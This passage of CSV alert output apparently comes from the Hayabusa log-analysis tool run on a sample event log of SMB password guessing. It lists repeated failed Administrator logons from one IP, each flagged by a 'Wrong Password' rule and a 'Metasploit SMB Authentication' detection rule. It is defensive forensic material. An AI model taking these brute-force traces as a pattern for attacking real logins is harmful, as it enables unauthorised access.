Password,User: Administrator : Type: 3 : Workstation: X9f7wCJ3wI9RmZTL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.069 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LkVs1viGo4RxhFaY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.117 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OKMLt6t01vUDDq1s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xYSif8ADOkC8aInB : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.254 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EpmraSe2sxFVupTy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.300 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VPtfy3AxXpt9D3bx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.352 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tRMOrE0Ba983q0Jv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.397 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jQ0nkyTAeJt3dCpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n2fdsRMU9SMm1KpL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3kliEPBsbsYNI7yG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.538 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 9gEKFGsRvvlzulxR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5M6oUbT8LvS7JNCq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E4dxHwRQVR7iBWa1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.661 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VRygirU257VfFcR5 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6H6i0wkjvWkU6cmp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W4Nh7bYfVvx30hVF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.793 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GQEsO4GpVjO5xpRh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.849 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: c9ZlpSBwq0tLAgzm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.885 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 65Piip53B1AiSBqb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.933 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bh7SfuheoykW7Aym : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:33.974 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: tWdm76C4nL6tkU0Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.019 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u2WEqTrg3A760Axt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.065 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyqhXspTlWwVCwA3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4rkidbQJmvQr35Jg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.160 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zr92VsL1YgHVehnL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.193 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rQP1K9rHrOyL0TOc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.235 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LR783q3o34oLQLTI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.281 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6NCTNhcghRGWf1qi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CVJdStLdKDbUICyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.354 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luAoVhEj1rOgZBfp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: OrqmovxoEEjLCaYV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.453 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AIP4mDSVhM27IAIP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.491 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cym5lXDK01XuJz2b : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.537 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7pYXA1Ic6BOfG31o : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.573 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b722QrTSVoZGfiK8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NzRFz4L7dpar794B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.657 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pLWuw9eMN9rqm0Ic : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.697 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sE7pzfiKRfOb2dH5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.737 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YxL1cV8OiFVRfj4I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.786 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qHs8Z8XPLg58jZ1u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.817 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: i6kRLlJt3Oxwhdgq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.857 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s4kTwriHAKVsTqzB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.897 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jfitpZ5ZrzBfpNf6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.941 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NdcU6ypEEeIAugGI : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:34.984 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jIMfGIU1pHasO88g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MHsxKEQK7CWSqprp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.073 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QkC70klP6mv8YZrN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:35.118 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
